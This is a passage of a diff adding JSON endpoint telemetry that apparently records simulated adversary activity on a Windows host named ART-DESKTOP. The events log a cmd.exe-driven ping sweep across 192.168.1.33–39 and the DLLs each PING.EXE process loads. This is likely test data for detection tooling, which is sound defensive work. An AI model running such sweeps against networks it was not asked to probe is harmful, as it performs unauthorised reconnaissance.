"{42FC7E13-CB5E-5C05-0000-001059C15101}" + }, + { + "event_type": "process", + "pid": 6672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572146830000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.33", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2216, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572146980000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572146980000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572146980000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572146980000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572146980000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572146980000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572146980000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572146980000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572146980000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572146980000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572146980000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572146980000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" + }, + { + "event_type": "process", + "pid": 2216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572151840000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.34", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5508, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572151980000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572151990000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572151990000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572151990000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572151990000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572151990000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572151990000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572151990000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572151990000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572151990000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572151990000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572151990000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" + }, + { + "event_type": "process", + "pid": 5508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572156990000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.35", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2504, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572157140000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572157140000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572157140000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572157140000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572157140000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572157140000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572157140000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572157140000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572157140000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572157140000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572157140000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572157140000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" + }, + { + "event_type": "process", + "pid": 2504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572161830000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.36", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4592, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572161980000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572161980000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572161980000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572161980000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572161980000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572161980000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572161980000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572161980000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572161980000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572161980000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572161980000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572161980000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" + }, + { + "event_type": "process", + "pid": 4592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572166990000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.37", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3036, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572167150000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572167140000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572167140000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572167140000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572167140000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572167140000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572167140000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572167140000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572167140000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572167140000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572167140000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572167140000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" + }, + { + "event_type": "process", + "pid": 3036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572171830000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.38", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5532, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572171980000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572171980000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572171980000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572171980000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572171980000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572171980000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572171980000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572171980000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572171980000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572171980000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572171980000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572171980000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" + }, + { + "event_type": "process", + "pid": 5532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572176990000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.39", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5512, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572177140000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5512, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572177140000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5512, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572177140000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5512, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572177140000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5512, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572177140000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5512, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572177140000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5512, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572177140000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5512, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572177140000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5512, + "process_name": "PING.EXE", + "process_path": 